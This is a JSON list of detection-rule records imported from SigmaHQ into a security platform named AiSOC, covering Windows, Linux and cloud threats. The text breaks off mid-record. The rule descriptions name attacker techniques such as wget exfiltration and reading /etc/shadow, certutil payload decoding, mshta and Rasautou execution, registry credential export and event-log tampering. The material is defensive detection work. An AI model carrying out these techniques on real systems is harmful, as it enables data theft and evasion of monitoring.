"sigmahq-sigma-cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "type": "detection", "name": "Data Exfiltration with Wget", "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-exfiltration-with-wget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_data_exfil_wget.yml" } }, { "id": "sigmahq-sigma-cb5a2333-56cf-4562-8fcb-22ba1bca728d", "type": "detection", "name": "Obfuscated IP Download Activity", "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-ip-download-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" } }, { "id": "sigmahq-sigma-cb7c4a03-2871-43c0-9bbb-18bbdb079896", "type": "detection", "name": "Unmount Share Via Net.EXE", "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unmount-share-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_share_unmount.yml" } }, { "id": "sigmahq-sigma-cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec", "type": "detection", "name": "Insecure Transfer Via Curl.EXE", "description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/insecure-transfer-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml" } }, { "id": "sigmahq-sigma-cbb56d62-4060-40f7-9466-d8aaf3123f83", "type": "detection", "name": "Python Image Load By Non-Python Process", "description": "Detects the image load of \"Python Core\" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.\nVarious tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.\nThreat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-image-load-by-non-python-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_python_image_load.yml" } }, { "id": "sigmahq-sigma-cbb67ecc-fb70-4467-9350-c910bdf7c628", "type": "detection", "name": "Added Credentials to Existing Application", "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/added-credentials-to-existing-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbb67ecc-fb70-4467-9350-c910bdf7c628", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_credential_added.yml" } }, { "id": "sigmahq-sigma-cbb9e3d1-2386-4e59-912e-62f1484f7a89", "type": "detection", "name": "Conhost Spawned By Uncommon Parent Process", "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/conhost-spawned-by-uncommon-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml" } }, { "id": "sigmahq-sigma-cbe51394-cd93-4473-b555-edf0144952d9", "type": "detection", "name": "DNS Server Error Failed Loading the ServerLevelPluginDLL", "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-server-error-failed-loading-the-serverlevelplugindll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbe51394-cd93-4473-b555-edf0144952d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml" } }, { "id": "sigmahq-sigma-cbec226f-63d9-4eca-9f52-dfb6652f24df", "type": "detection", "name": "Suspicious Process Parents", "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-parents.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_parents.yml" } }, { "id": "sigmahq-sigma-cbf93e5d-ca6c-4722-8bea-e9119007c248", "type": "detection", "name": "CurrentVersion NT Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/currentversion-nt-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" } }, { "id": "sigmahq-sigma-cc1abf27-78a3-4ac5-a51c-f3070b1d8e40", "type": "detection", "name": "Registry Export of Third-Party Credentials", "description": "Detects the use of reg.exe to export registry paths associated with third-party credentials.\nCredential stealers have been known to use this technique to extract sensitive information from the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-export-of-third-party-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc1abf27-78a3-4ac5-a51c-f3070b1d8e40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_export_of_thirdparty_creds.yml" } }, { "id": "sigmahq-sigma-cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "type": "detection", "name": "Devtoolslauncher.exe Executes Specified Binary", "description": "The Devtoolslauncher.exe executes other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/devtoolslauncher-exe-executes-specified-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml" } }, { "id": "sigmahq-sigma-cc368ed0-2411-45dc-a222-510ace303cb2", "type": "detection", "name": "Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location", "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-of-regasm-regsvcs-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc368ed0-2411-45dc-a222-510ace303cb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml" } }, { "id": "sigmahq-sigma-cc36992a-4671-4f21-a91d-6c2b72a2edf5", "type": "detection", "name": "Suspicious Eventlog Clearing or Configuration Change Activity", "description": "Detects the clearing or configuration tampering of EventLog using utilities such as \"wevtutil\", \"powershell\" and \"wmic\".\nThis technique were seen used by threat actors and ransomware strains in order to evade defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685.005", "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/suspicious-eventlog-clearing-or-configuration-change-activity.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" } }, { "id": "sigmahq-sigma-cc4e02ba-9c06-48e2-b09e-2500cace9ae0", "type": "detection", "name": "Tasks Folder Evasion", "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application\nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tasks-folder-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml" } }, { "id": "sigmahq-sigma-cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "type": "detection", "name": "MSHTA Execution with Suspicious File Extensions", "description": "Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,\nsuch as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications\ncontaining VBScript or JScript. Threat actors often abuse this lolbin utility to download and\nexecute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1218.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mshta-execution-with-suspicious-file-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml" } }, { "id": "sigmahq-sigma-cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "type": "detection", "name": "File Decoded From Base64/Hex Via Certutil.EXE", "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-decoded-from-base64-hex-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_decode.yml" } }, { "id": "sigmahq-sigma-cc9d3712-6310-4320-b2df-7cb408274d53", "type": "detection", "name": "Rebuild Performance Counter Values Via Lodctr.EXE", "description": "Detects the execution of \"lodctr.exe\" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rebuild-performance-counter-values-via-lodctr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc9d3712-6310-4320-b2df-7cb408274d53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml" } }, { "id": "sigmahq-sigma-ccb5742c-c248-4982-8c5c-5571b9275ad3", "type": "detection", "name": "Recon Command Output Piped To Findstr.EXE", "description": "Detects the execution of a potential recon command where the results are piped to \"findstr\". This is meant to trigger on inline calls of \"cmd.exe\" via the \"/c\" or \"/k\" for example.\nAttackers often time use this technique to extract specific information they require in their reconnaissance phase.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1057" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-command-output-piped-to-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ccb5742c-c248-4982-8c5c-5571b9275ad3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml" } }, { "id": "sigmahq-sigma-ccd55945-badd-4bae-936b-823a735d37dd", "type": "detection", "name": "Github Push Protection Disabled", "description": "Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-push-protection-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ccd55945-badd-4bae-936b-823a735d37dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_push_protection_disabled.yml" } }, { "id": "sigmahq-sigma-ccd6a6c8-bb4e-4a91-9d2a-07e632819374", "type": "detection", "name": "AWS SAML Provider Deletion Activity", "description": "Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.\nAn attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-saml-provider-deletion-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ccd6a6c8-bb4e-4a91-9d2a-07e632819374", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_delete_saml_provider.yml" } }, { "id": "sigmahq-sigma-cd072b25-a418-4f98-8ebc-5093fb38fe1a", "type": "detection", "name": "Cisco Collect Data", "description": "Collect pertinent data from the configuration files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1552.001", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-collect-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_collect_data.yml" } }, { "id": "sigmahq-sigma-cd0a4943-0edd-42cf-b50c-06f77a10d4c1", "type": "detection", "name": "FortiGate - New Administrator Account Created", "description": "Detects the creation of an administrator account on a Fortinet FortiGate Firewall.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-administrator-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd0a4943-0edd-42cf-b50c-06f77a10d4c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_admin_account_created.yml" } }, { "id": "sigmahq-sigma-cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - Security", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" } }, { "id": "sigmahq-sigma-cd185561-4760-45d6-a63e-a51325112cae", "type": "detection", "name": "Live Memory Dump Using Powershell", "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/live-memory-dump-using-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd185561-4760-45d6-a63e-a51325112cae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" } }, { "id": "sigmahq-sigma-cd1f961e-0b96-436b-b7c6-38da4583ec00", "type": "detection", "name": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-trace-etw-session-tamper-via-logman-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml" } }, { "id": "sigmahq-sigma-cd219ff3-fa99-45d4-8380-a7d15116c6dc", "type": "detection", "name": "New User Created Via Net.EXE", "description": "Identifies the creation of local users via the net.exe command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-user-created-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_user_add.yml" } }, { "id": "sigmahq-sigma-cd277474-5c52-4423-a52b-ac2d7969902f", "type": "detection", "name": "New BgInfo.EXE Custom WMI Query Registry Configuration", "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via \"BgInfo.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bginfo-exe-custom-wmi-query-registry-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd277474-5c52-4423-a52b-ac2d7969902f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml" } }, { "id": "sigmahq-sigma-cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", "type": "detection", "name": "Google Cloud Kubernetes CronJob", "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-cronjob.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml" } }, { "id": "sigmahq-sigma-cd3d1298-eb3b-476c-ac67-12847de55813", "type": "detection", "name": "DLL Execution via Rasautou.exe", "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-execution-via-rasautou-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd3d1298-eb3b-476c-ac67-12847de55813", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 